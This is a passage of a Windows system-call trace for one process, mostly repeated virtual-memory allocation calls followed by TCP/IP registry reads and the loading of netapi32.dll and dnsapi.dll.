0x0 02827 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02828 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02829 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02830 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02831 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02832 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02833 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02834 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02835 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02836 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02837 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02838 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02839 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02840 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02841 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02842 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02843 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02844 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02845 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02846 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02847 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02848 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02849 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02850 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02851 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02852 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02853 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02854 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02855 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02856 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02857 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02858 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02859 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02860 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02861 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02862 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02863 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02864 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02865 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02866 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02867 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02868 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02869 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02870 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02871 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02872 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02873 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02874 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02875 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02876 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02877 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02878 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02879 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02880 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02881 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02882 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02883 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02884 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02885 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02886 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02887 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02888 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02889 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02890 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02891 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02892 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02893 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02894 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02895 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02896 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02897 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02898 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02899 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02900 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02901 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02902 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02903 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02904 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02905 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02906 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02907 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02908 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02909 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02910 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02911 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02912 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02913 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02914 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02915 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02916 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02917 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02918 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02919 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02920 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02921 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02922 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02923 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02924 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02925 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02926 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02927 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02928 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02929 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02930 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02931 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02932 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02933 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02934 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02935 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02936 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02937 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02938 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02939 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02940 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02941 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02942 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02943 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\Tcpip\Linkage"}, ... 276, ) }, ... 276, ) == 0x0 02944 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\"}, ... 280, ) }, ... 280, ) == 0x0 02945 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces"}, ... 284, ) }, ... 284, ) == 0x0 02946 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\NetBT\Parameters"}, ... 288, ) }, ... 288, ) == 0x0 02947 896 NtQueryDefaultLocale (1, 1241240, ... ) == 0x0 02948 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icmp.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02949 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "netapi32.dll"}, ... 292, ) }, ... 292, ) == 0x0 02950 896 NtMapViewOfSection (292, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x5b860000), 0x0, 344064, ) == 0x0 02951 896 NtClose (292, ... ) == 0x0 02952 896 NtProtectVirtualMemory (-1, (0x5b861000), 1168, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02953 896 NtProtectVirtualMemory (-1, (0x5b861000), 4096, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02954 896 NtFlushInstructionCache (-1, 1535512576, 1168, ... ) == 0x0 02955 896 NtProtectVirtualMemory (-1, (0x5b861000), 1168, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02956 896 NtProtectVirtualMemory (-1, (0x5b861000), 4096, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02957 896 NtFlushInstructionCache (-1, 1535512576, 1168, ... ) == 0x0 02958 896 NtProtectVirtualMemory (-1, (0x5b861000), 1168, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02959 896 NtProtectVirtualMemory (-1, (0x5b861000), 4096, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02960 896 NtFlushInstructionCache (-1, 1535512576, 1168, ... ) == 0x0 02961 896 NtProtectVirtualMemory (-1, (0x5b861000), 1168, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02962 896 NtProtectVirtualMemory (-1, (0x5b861000), 4096, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02963 896 NtFlushInstructionCache (-1, 1535512576, 1168, ... ) == 0x0 02964 896 NtProtectVirtualMemory (-1, (0x5b861000), 1168, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02965 896 NtProtectVirtualMemory (-1, (0x5b861000), 4096, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02966 896 NtFlushInstructionCache (-1, 1535512576, 1168, ... ) == 0x0 02967 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netapi32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02968 896 NtProtectVirtualMemory (-1, (0x5b861128), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02969 896 NtProtectVirtualMemory (-1, (0x5b861128), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02970 896 NtProtectVirtualMemory (-1, (0x5b861170), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02971 896 NtProtectVirtualMemory (-1, (0x5b861170), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02972 896 NtProtectVirtualMemory (-1, (0x5b861180), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02973 896 NtProtectVirtualMemory (-1, (0x5b861180), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02974 896 NtProtectVirtualMemory (-1, (0x5b861188), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02975 896 NtProtectVirtualMemory (-1, (0x5b861188), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02976 896 NtProtectVirtualMemory (-1, (0x5b8611ac), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02977 896 NtProtectVirtualMemory (-1, (0x5b8611ac), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02978 896 NtProtectVirtualMemory (-1, (0x5b8611b4), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02979 896 NtProtectVirtualMemory (-1, (0x5b8611b4), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02980 896 NtProtectVirtualMemory (-1, (0x5b8611b8), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02981 896 NtProtectVirtualMemory (-1, (0x5b8611b8), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02982 896 NtProtectVirtualMemory (-1, (0x5b8611d0), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02983 896 NtProtectVirtualMemory (-1, (0x5b8611d0), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02984 896 NtProtectVirtualMemory (-1, (0x5b8611dc), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02985 896 NtProtectVirtualMemory (-1, (0x5b8611dc), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02986 896 NtProtectVirtualMemory (-1, (0x5b861218), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02987 896 NtProtectVirtualMemory (-1, (0x5b861218), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02988 896 NtProtectVirtualMemory (-1, (0x5b861224), 4, 4, ... (0x5b861000), 4096, 32, ) == 0x0 02989 896 NtProtectVirtualMemory (-1, (0x5b861224), 4, 32, ... (0x5b861000), 4096, 4, ) == 0x0 02990 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "dnsapi.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02991 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\dnsapi.dll"}, 1239772, ... ) }, 1239772, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02992 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\dnsapi.dll"}, 1239772, ... ) }, 1239772, ... ) == 0x0 02993 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\dnsapi.dll"}, 5, 96, ... 292, {status=0x0, info=1}, ) }, 5, 96, ... 292, {status=0x0, info=1}, ) == 0x0 02994 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 292, ... 296, ) == 0x0 02995 896 NtQuerySection (296, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 02996 896 NtClose (292, ... ) == 0x0 02997 896 NtMapViewOfSection (296, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76f20000), 0x0, 159744, ) == 0x0 02998 896 NtClose (296, ... ) == 0x0 02999 896 NtProtectVirtualMemory (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03000 896 NtProtectVirtualMemory (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03001 896 NtFlushInstructionCache (-1, 1995575296, 616, ... ) == 0x0 03002 896 NtProtectVirtualMemory (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03003 896 NtProtectVirtualMemory (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03004 896 NtFlushInstructionCache (-1, 1995575296, 616, ... ) == 0x0 03005 896 NtProtectVirtualMemory (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03006 896 NtProtectVirtualMemory (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03007 896 NtFlushInstructionCache (-1, 1995575296, 616, ... ) == 0x0 03008 896 NtProtectVirtualMemory (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03009 896 NtProtectVirtualMemory (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03010 896 NtFlushInstructionCache (-1, 1995575296, 616, ... ) == 0x0 03011 896 NtProtectVirtualMemory (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03012 896 NtProtectVirtualMemory (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03013 896 NtFlushInstructionCache (-1, 1995575296, 616, ... ) == 0x0 03014 896 NtProtectVirtualMemory (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0 03015 896 NtProtectVirtualMemory (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0 03016 896 NtFlushInstructionCache (-1, 1995575296, 616, ... ) == 0x0 03017 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dnsapi.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03018 896 NtCreateKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 296, 2, ) }, 0, (0x20019, {24, 28, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 296, 2, ) , 0, ... 296, 2, ) == 0x0 03019 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "System\CurrentControlSet\Services\DnsCache\Parameters"}, ... 292, ) }, ... 292, ) == 0x0 03020 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, 